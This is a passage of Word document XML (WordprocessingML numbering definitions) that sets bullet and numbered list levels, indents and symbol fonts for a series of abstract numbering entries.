    <w:lvl w:ilvl="6" w:tplc="E61EA282">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F29CCD40">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="CB668920">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="45" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4C830D67"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C45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463112"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CBE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50694B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40C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891262"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE760382"/>
    <w:lvl w:ilvl="0" w:tplc="389AB6E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="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5616F5E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A0E628CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="13E4522A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="74F8D0BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C496528E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A49A2BCE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E2101EEC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B164FCDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F2AC61FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C8085D76">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="50" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="564443CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="AE5690BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AC4C7900">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="5B8EC42C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="87B24ADC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="26CA7108">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A99EC25C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D54EAEDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C73CE116">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C4884C26">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="51" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="57466CA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="994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EC166D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0634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09669B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="351C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277322"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75CC8C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B316EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="2E1EB714">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1F60288E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="504E4B10">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="391C4E30">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="DF0EB42A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="298C6276">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C4602B5C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EB06C956">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6436016C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="56" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="666A4C90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="C1C2A250">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="5AC8224A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C3C4B48A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A2122F22">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="842293D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7C20557E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="51DCFA62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0E7870E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C00402B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="57" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6928788D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E78EF7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12169"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0C8E7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43186E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="A65CB4B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="9822B956">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="861C68CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1E46C7D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="9864C1CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E0AA7264">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="09CA0F26">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7696BA30">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="541E7DC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="60" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="709F5201"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="443E78F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="60A61452">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DAAC9928">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="39E0AF2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="68947F26">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6B8E92AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E8B066CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3000ECAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="11AAF546">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="61" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="71AB0BEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="00E46DE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B5B68BD6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2AD453F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="657E25AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B7EC90BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B9B4C07E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5D2CDD88">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6E201E44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="56B4BE70">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="62" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7222501C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7E947996">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
